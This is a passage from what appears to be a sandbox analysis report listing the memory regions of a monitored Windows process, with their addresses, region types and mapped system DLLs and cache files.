end_va = 0x31a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031a0000" filename = "" Region: id = 6691 start_va = 0x31b0000 end_va = 0x31b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031b0000" filename = "" Region: id = 6692 start_va = 0x31c0000 end_va = 0x31c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031c0000" filename = "" Region: id = 6693 start_va = 0x31d0000 end_va = 0x31d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 6694 start_va = 0x31e0000 end_va = 0x31e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031e0000" filename = "" Region: id = 6695 start_va = 0x31f0000 end_va = 0x31f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031f0000" filename = "" Region: id = 6696 start_va = 0x3200000 end_va = 0x3200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 6727 start_va = 0x3210000 end_va = 0x3210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 6728 start_va = 0x3220000 end_va = 0x3220fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003220000" filename = "" Region: id = 6729 start_va = 0x3230000 end_va = 0x3230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 6730 start_va = 0x3240000 end_va = 0x3240fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003240000" filename = "" Region: id = 6731 start_va = 0x3250000 end_va = 0x3250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003250000" filename = "" Region: id = 6732 start_va = 0x3260000 end_va = 0x3260fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003260000" filename = "" Region: id = 6733 start_va = 0x3270000 end_va = 0x3270fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003270000" filename = "" Region: id = 6734 start_va = 0x3280000 end_va = 0x3280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 6735 start_va = 0x3290000 end_va = 0x3290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 6736 start_va = 0x32a0000 end_va = 0x32a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 6737 start_va = 0x32b0000 end_va = 0x32b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 6738 start_va = 0x32c0000 end_va = 0x32c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 6739 start_va = 0x32d0000 end_va = 0x32d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 6740 start_va = 0x32e0000 end_va = 0x32e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 6741 start_va = 0x32f0000 end_va = 0x32f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 6742 start_va = 0x3300000 end_va = 0x3300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 6743 start_va = 0x3310000 end_va = 0x3310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 6744 start_va = 0x3320000 end_va = 0x3320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 6745 start_va = 0x3330000 end_va = 0x3330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 6746 start_va = 0x3340000 end_va = 0x3340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 6747 start_va = 0x3350000 end_va = 0x3350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 6748 start_va = 0x3360000 end_va = 0x3360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 6749 start_va = 0x3370000 end_va = 0x3370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 6750 start_va = 0x3380000 end_va = 0x3380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 6751 start_va = 0x3390000 end_va = 0x3390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 6752 start_va = 0x33a0000 end_va = 0x33a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 6753 start_va = 0x33b0000 end_va = 0x33b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 6754 start_va = 0x33c0000 end_va = 0x33c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 6758 start_va = 0x33d0000 end_va = 0x33d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 6759 start_va = 0x33e0000 end_va = 0x33e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 6760 start_va = 0x33f0000 end_va = 0x33f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 6761 start_va = 0x3400000 end_va = 0x3400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 6762 start_va = 0x3410000 end_va = 0x3410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 6763 start_va = 0x3420000 end_va = 0x3420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 6764 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6765 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6766 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6767 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6768 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6769 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6770 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6771 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6772 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6773 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6774 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6775 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6776 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6777 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6778 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6779 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6780 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6781 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6782 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6783 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6784 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6785 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6786 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6787 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6788 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6789 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6790 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6791 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6813 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 6814 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 6815 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6816 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6817 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6818 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6819 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6820 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6821 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6822 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6823 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6824 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6825 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6826 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6827 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6828 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6987 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6988 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6989 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6990 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6991 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6992 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 6993 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 7028 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7029 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7030 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7031 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7032 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7033 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7034 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7035 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7036 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7037 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7038 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7039 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7040 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7041 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7042 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7043 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7044 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7045 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7046 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7047 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7048 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7049 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7050 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7051 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7052 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7053 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7054 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7055 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7270 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7271 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7272 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7273 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7274 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7275 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7276 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7277 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7278 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7279 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7280 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7281 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7282 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7283 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7295 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7296 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7297 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7298 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7299 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7498 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7499 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7500 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7501 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7502 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7503 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7504 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7505 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7506 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7507 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7508 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7509 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7510 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7511 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7512 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7513 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7514 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7518 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7521 start_va = 0x3440000 end_va = 0x3492fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7522 start_va = 0xc50000 end_va = 0xc53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7741 start_va = 0x3440000 end_va = 0x3457fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 7742 start_va = 0xc50000 end_va = 0xc53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7743 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7744 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7745 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7746 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7747 start_va = 0xc50000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7748 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7749 start_va = 0xc50000 end_va = 0xc54fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7750 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7751 start_va = 0xc50000 end_va = 0xc53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7752 start_va = 0x25b0000 end_va = 0x25b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 7753 start_va = 0xc50000 end_va = 0xc5afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c50000" filename = "" Region: id = 7761 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 7766 start_va = 0x779b0000 end_va = 0x779b4fff monitored = 0 entry_point = 0x779b1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 7973 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 8007 start_va = 0x3440000 end_va = 0x347ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 8008 start_va = 0x3480000 end_va = 0x357ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 8009 start_va = 0x740a0000 end_va = 0x74194fff monitored = 0 entry_point = 0x740b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 8010 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 8011 start_va = 0x2660000 end_va = 0x2661fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002660000" filename = "" Region: id = 8012 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 8013 start_va = 0x2710000 end_va = 0x2710fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 8044 start_va = 0x27c0000 end_va = 0x27c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027c0000" filename = "" Region: id = 8045 start_va = 0x2710000 end_va = 0x2710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002710000" filename = "" Region: id = 8046 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 8047 start_va = 0x3580000 end_va = 0x3580fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003580000" filename = "" Region: id = 8048 start_va = 0x745b0000 end_va = 0x745d0fff monitored = 0 entry_point = 0x745b145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 8049 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 8050 start_va = 0x3590000 end_va = 0x3593fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 8051 start_va = 0x35a0000 end_va = 0x35b6fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 8088 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035c0000" filename = "" Region: id = 8089 start_va = 0x745e0000 end_va = 0x745eafff monitored = 0 entry_point = 0x745e1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 8090 start_va = 0x3590000 end_va = 0x3593fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = 